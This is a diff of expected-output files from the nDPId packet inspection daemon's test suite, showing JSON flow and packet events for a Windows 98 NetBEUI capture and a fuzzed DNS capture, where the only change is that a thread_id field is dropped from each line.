00382{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":214,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409925057,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAAGQAAAAAAAAAAAAAAAAAAAAAATUFSVElOIFJPU0VOQVUgAw=="} 00368{"packet_event_id":1,"packet_event_name":"packet","packet_id":214,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409925057,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAAGQAAAAAAAAAAAAAAAAAAAAAATUFSVElOIFJPU0VOQVUgAw=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":214,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409926307} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":214,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409926307}
00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1576409798047,"flow_last_seen":1576409798047,"flow_idle_time":120000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1576409931837,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"224.0.0.2","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1576409798047,"flow_last_seen":1576409798047,"flow_idle_time":120000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1576409931837,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"224.0.0.2","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1576409800543,"flow_last_seen":1576409931837,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":2176,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409931837,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1576409800543,"flow_last_seen":1576409931837,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":2176,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409931837,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1576409797553,"flow_last_seen":1576409928060,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":952,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409931837,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.2","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1576409797553,"flow_last_seen":1576409928060,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":952,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409931837,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.2","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
@@ -351,6 +351,6 @@
~~ total memory freed........: 4684212 bytes ~~ total memory freed........: 4684212 bytes
~~ total allocations/frees...: 101214/101214 ~~ total allocations/frees...: 101214/101214
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 214 chars ~~ json string min len.......: 200 chars
~~ json string max len.......: 1917 chars ~~ json string max len.......: 1903 chars
~~ json string avg len.......: 1065 chars ~~ json string avg len.......: 1051 chars

380
test/results/fuzz-2006-06-26-2594.pcap.out
View File

@@ -23,8 +23,8 @@
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469556827,"flow_last_seen":1120469556827,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469556827,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469556827,"flow_last_seen":1120469556827,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469556827,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1120469556827,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469556827,"pkt":"ADBUADRWAODtAW69CABFAABIaZMAAIARTb7AqAFuwKgBAQqZADUANN1ZTNIBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5JXMAJXMAAAE="} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1120469556827,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469556827,"pkt":"ADBUADRWAODtAW69CABFAABIaZMAAIARTb7AqAFuwKgBAQqZADUANN1ZTNIBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5JXMAJXMAAAE="}
00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469556827,"flow_last_seen":1120469556827,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469556827,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":9587,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469556827,"flow_last_seen":1120469556827,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469556827,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":9587,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00413{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":12,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":27904,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120469556827,"pkt":"ADBUADRWAODtAW69bQBFAABIaZQAAIARTb3QqAECwKgBAQqZADUANN1ZTNIBAAABAAAAAAAABF9zaXAMX3VkcINzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":12,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":27904,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120469556827,"pkt":"ADBUADRWAODtAW69bQBFAABIaZQAAIARTb3QqAECwKgBAQqZADUANN1ZTNIBAAABAAAAAAAABF9zaXAMX3VkcINzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":12,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":27904,"global_ts_msec":1120469558830} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":12,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":27904,"global_ts_msec":1120469558830}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469560833,"flow_last_seen":1120469560833,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469560833,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2597,"dst_port":29440,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469560833,"flow_last_seen":1120469560833,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469560833,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2597,"dst_port":29440,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1120469560833,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469560833,"pkt":"ADBUADRWAODtAW69CABFAABIaZUAAIARTbzAqAECwKgBAQolcwAANN9ZTE4BAAABACVzAAAABF9zaXAEX1VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1120469560833,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469560833,"pkt":"ADBUADRWAODtAW69CABFAABIaZUAAIARTbzAqAECwKgBAQolcwAANN9ZTE4BAAABACVzAAAABF9zaXAEX1VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1120469564839,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469564839,"pkt":"ADBUADRWAODtAW69CABFAABIaZYAAIARTbvAqAECwKgBAQqZADUANN1ZTNIBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1120469564839,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469564839,"pkt":"ADBUADRWAODtAW69CABFAABIaZYAAIARTbvAqAECwKgBAQqZADUANN1ZTNIBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
@@ -45,20 +45,20 @@
00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469573246,"flow_last_seen":1120469573246,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469573246,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":32,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469573246,"flow_last_seen":1120469573246,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469573246,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":32,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1120469574242,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469574242,"pkt":"ADBUADRWAODtAW69CABFAABIaZoAAIARTbfAqAECwKgBAQqbADUANPFWONMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1120469574242,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469574242,"pkt":"ADBUADRWAODtAW69CABFAABIaZoAAIARTbfAqAECwKgBAQqbADUANPFWONMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469573246,"flow_last_seen":1120469574242,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469574242,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469573246,"flow_last_seen":1120469574242,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469574242,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00413{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":23,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120469574242,"pkt":"ADCqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":23,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120469574242,"pkt":"ADCqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":23,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120469576245} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":23,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120469576245}
00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1120469578248,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469578248,"pkt":"ADBUADRWAODtAW69CABFAABIaZwAAIARTbXAqAECwKgBAQqbADUANPFWONMBAAABAAAAAABJBF9zaXAEX3VkcANzaXAJY3liZXLyaXR5AmRrAAAhAAE="} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1120469578248,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469578248,"pkt":"ADBUADRWAODtAW69CABFAABIaZwAAIARTbXAqAECwKgBAQqbADUANPFWONMBAAABAAAAAABJBF9zaXAEX3VkcANzaXAJY3liZXLyaXR5AmRrAAAhAAE="}
00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469573246,"flow_last_seen":1120469578248,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469578248,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyber?ity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469573246,"flow_last_seen":1120469578248,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469578248,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyber?ity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00412{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":25,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120469578248,"pkt":"ADBUADRWAODtAW69CABFAAB2aZ0AAIARTbTAqAECwKgBAQqbADUANPFWONMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5TWRrAAAhAAE="} 00398{"packet_event_id":1,"packet_event_name":"packet","packet_id":25,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120469578248,"pkt":"ADBUADRWAODtAW69CABFAAB2aZ0AAIARTbTAqAECwKgBAQqbADUANPFWONMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5TWRrAAAhAAE="}
00229{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":25,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120469582254} 00215{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":25,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120469582254}
00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1120469589080,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120469589080,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOaZ4AAIARTK\/AqAECwKgB\/wCJAIkAOluxhOoBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} 00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1120469589080,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120469589080,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOaZ4AAIARTK\/AqAECwKgB\/wCJAIkAOluxhOoBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590256,"flow_last_seen":1120469590256,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469590256,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 